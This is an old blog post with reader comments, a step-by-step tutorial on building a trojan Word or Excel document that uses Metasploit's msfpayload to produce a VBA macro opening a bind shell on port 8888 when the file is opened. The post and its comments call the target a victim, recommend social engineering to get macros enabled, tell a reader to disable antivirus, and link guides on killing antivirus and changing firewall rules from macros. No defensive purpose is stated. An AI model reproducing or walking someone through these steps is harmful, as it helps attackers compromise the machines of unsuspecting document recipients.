Writing malicious macros using metasploit

This is actually a nice little feature of Metasploit which many of us are not aware. Here I will guide you through this.

Metasploit is nice tool written in ruby and very useful to penetration testers (and script kiddies) It provides good information on exploit techniques and is also a useful resource for exploit developers and security professionals. Latest release is 3.1 version as of now and its upcoming version 3.2 will be more hack-pack.

Enough of insight into metasploit, now back to action. We will create a malicious .doc file which will spawn a tcp shell on port 8888 on simply opening the file. However remember that MACROs must be enabled on victim’s system.
1. Go to Start–>All Programs–>Metasploit–>CMD SHELL.

2. type cd %APPDATA%
3. Next type in: ruby msf3/msfpayload windows/shell_bind_tcp LPORT=8888 V > macro.vba
4. Now to use this malicious vba file, open Microsoft Word/Excel.

5. Go to tools–>Macros–>Visual Basic Editor. Copy the contents of vba file and paste in the VB editor.


6. To enable macro tools–>Macros–>Security. Select the security level as low.

You get this alert window up when macro is disabled.

7. Now save the doc file.

8. On opening the seemingly harmless file, it will automatically spawn a cmd shell on port 8888.

Telnet on that port to spawn a command shell.


So now we have a malicious doc ready for action. We can use any available payload like connect back to attacker or even vnc inject payload. Hope this is helpful.

Share
  • ranger

    Thanks w0lf. That was helpful. I was not aware that metasploit that those features. That was a pretty simple trick to create trojan documents :)

  • http://blog.invisibledenizen.org natron

    A few posts on some of the powerful things you can do through VBA in Word and Excel:

    Running commands or programs: http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html

    Downloading files and saving them to disk: http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html

    Running commands as SYSTEM: http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html

    Killing off any antivirus that may be running: http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html

    Modifying the Windows Firewall: http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html

    Once a user clicks to allow macros, you can do absolutely anything the user can…

  • http://maestro-sec.com/ w0lf

    Thanks natron. Nice posts

  • vikjava

    I using metasploit for windows. When I type
    C:\Program Files\Metasploit\Framework3>%APPDATA%
    ‘C:\Documents’ is not recognized as an internal or external command,
    operable program or batch file.

    Help me! thanks

  • http://maestro-sec.com/ w0lf

    Sorry vikjava, it was a typo. The correct windows command is ‘cd %APPDATA%’. The same has been updated in the post.

  • vikjava

    hi w0lf

    when i type ruby msf3/msfpayload windows/shell_bind_tcp LPORT=8888 V > macro.vba. macro.vba have size 0KB and empty. I go to metasploit and find problem but i don’t find it.

  • http://maestro-sec.com w0lf

    Well it should work. I am clueless about it. Check if your Anti-virus is responsible for this. Disable AV and try again.

  • r00ty

    @vikjava

    >when i type ruby msf3/msfpayload >windows/shell_bind_tcp LPORT=8888 V > >macro.vba. macro.vba have size 0KB and empty. I go >to metasploit and find problem but i don’t find it.

    The ‘V’ option is available in Metasploit 3.2

    3.1 generates a 0KB file and no error.

  • abhishek

    Hello,

    I tried this technique and it works fine.. But is there any way by which we can force to enable macros automatically when file is opened??? As macros are disabled by default. One can’t ask the victim to enable macros so that our payload is executed!!!

    By the way thanks for the great post!!!

  • http://maestro-sec.com w0lf

    Well for that you need to integrate some MS word exploit (if any available) along with this attack. What I would recommend in such scenarios is SOCIAL ENGINEERING.
    This is really a great tool if you know how to use it efficiently. :)

  • Anisha

    I used Metasploit 3 with windows XP. The vba file got generated and I added it as a macro for a word document .

    But nothing happens on opening the word document. I disassembled the file hvgvIKYIa.exe. This file has only two functions VirtualProtect and ExitProcess. Does this mean that there is something wrong with the macro.vba file that I have generated.

  • r00t

    i get this error
    “./lib/rex/text.rb:589:in `initialize’: No such file or directory – ./lib/rex/../
    ../data/templates/template.exe (Errno::ENOENT)
    from ./lib/rex/text.rb:589:in `open’
    from ./lib/rex/text.rb:589:in `to_win32pe’
    from msfpayload:143

  • abhishek

    Hi,

    This method used to work fine… But nowadays when I try to generate macros with metasploit… The file size is 180 kb… Which can’t be inserted in an office file..

    Anyone other facing same problem????

  • virus

    ./lib/rex/text.rb:589:in `initialize’: No such file or directory – ./lib/rex/../
    ../data/templates/template.exe (Errno::ENOENT)
    from ./lib/rex/text.rb:589:in `open’
    from ./lib/rex/text.rb:589:in `to_win32pe’
    from msfpayload:99